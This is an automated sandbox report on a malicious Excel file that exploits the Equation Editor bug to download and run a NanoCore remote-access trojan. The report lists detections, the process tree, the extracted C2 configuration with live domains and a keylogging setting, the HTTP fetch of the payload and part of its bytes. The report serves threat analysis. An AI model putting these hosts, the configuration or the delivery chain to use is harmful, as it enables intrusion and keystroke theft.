Loading ...

Play interactive tourEdit tour

Analysis Report Ref 0180066743.xlsx

Overview

General Information

Sample Name:Ref 0180066743.xlsx
Analysis ID:431726
MD5:dffc9e820070887fd0e4a4973e847a36
SHA1:32c5185f4aa508cc60ad331e4b3046dce732135c
SHA256:9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: EB43B3C033BD76B51B90A51A6726A81C)
      • RegAsm.exe (PID: 2164 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\vbc.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      C:\Users\user\AppData\Roaming\win33.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x13a8:$x1: NanoCore.ClientPluginHost
          00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x13a8:$x2: NanoCore.ClientPluginHost
          • 0x1486:$s4: PipeCreated
          • 0x13c2:$s5: IClientLoggingHost
          00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x8955:$x1: NanoCore.ClientPluginHost
          • 0x8992:$x2: IClientNetworkHost
          • 0xc4c5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0x86bd:$a: NanoCore
          • 0x86cd:$a: NanoCore
          • 0x8901:$a: NanoCore
          • 0x8915:$a: NanoCore
          • 0x8955:$a: NanoCore
          • 0x871c:$b: ClientPlugin
          • 0x891e:$b: ClientPlugin
          • 0x895e:$b: ClientPlugin
          • 0x8843:$c: ProjectData
          • 0x924a:$d: DESCrypto
          • 0xadff:$i: get_Connected
          • 0x9580:$j: #=q
          • 0x95b0:$j: #=q
          • 0x95cc:$j: #=q
          • 0x95fc:$j: #=q
          • 0x9618:$j: #=q
          • 0x9634:$j: #=q
          • 0x9664:$j: #=q
          • 0x9680:$j: #=q
          • 0x96c4:$j: #=q
          • 0x96e0:$j: #=q
          00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x16e3:$x1: NanoCore.ClientPluginHost
          • 0x171c:$x2: IClientNetworkHost
          Click to see the 55 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.RegAsm.exe.c10000.11.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x5b99:$x1: NanoCore.ClientPluginHost
          • 0x5bb3:$x2: IClientNetworkHost
          5.2.RegAsm.exe.c10000.11.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x5b99:$x2: NanoCore.ClientPluginHost
          • 0x6bce:$s4: PipeCreated
          • 0x5b86:$s5: IClientLoggingHost
          5.2.RegAsm.exe.cb0000.12.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x170b:$x1: NanoCore.ClientPluginHost
          • 0x1725:$x2: IClientNetworkHost
          5.2.RegAsm.exe.cb0000.12.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x170b:$x2: NanoCore.ClientPluginHost
          • 0x34b6:$s4: PipeCreated
          • 0x16f8:$s5: IClientLoggingHost
          4.2.vbc.exe.3627c48.8.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x1018d:$x1: NanoCore.ClientPluginHost
          • 0x101ca:$x2: IClientNetworkHost
          • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 120 entries

          Sigma Overview

          AV Detection:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.127.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

          E-Banking Fraud:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164

          Stealing of Sensitive Information:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Remote Access Functionality:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 4.2.vbc.exe.3486e00.5.raw.unpackMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: wekeepworking.sytes.netVirustotal: Detection: 7%Perma Link
          Source: wekeepworking.sytes.netVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeVirustotal: Detection: 39%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeReversingLabs: Detection: 30%
          Source: C:\Users\user\AppData\Roaming\win33.exeReversingLabs: Detection: 30%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 30%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ref 0180066743.xlsxReversingLabs: Detection: 21%
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\win33.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJoe Sandbox ML: detected
          Source: 5.2.RegAsm.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
          Source: 5.0.RegAsm.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 5.0.RegAsm.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 5.2.RegAsm.exe.de0000.14.unpackAvira: Label: TR/NanoCore.fadte

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
          Source: Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
          Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
          Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
          Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 79MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 004309C0h4_2_004301DD
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]4_2_00437685
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh4_2_00437730
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_04A0D6E0
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_0035E942
          Source: global trafficDNS query: name: wekeepworking.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: wekeepworking.sytes.net
          Source: Malware configuration extractorURLs: wekeepworking12.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.90:1144
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 06:04:57 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 08 Jun 2021 22:22:11 GMTETag: "b3400-5c44896d8ef42"Accept-Ranges: bytesContent-Length: 734208Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 0
          Source: Joe Sandbox ViewIP Address: 79.134.225.90 79.134.225.90
          Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
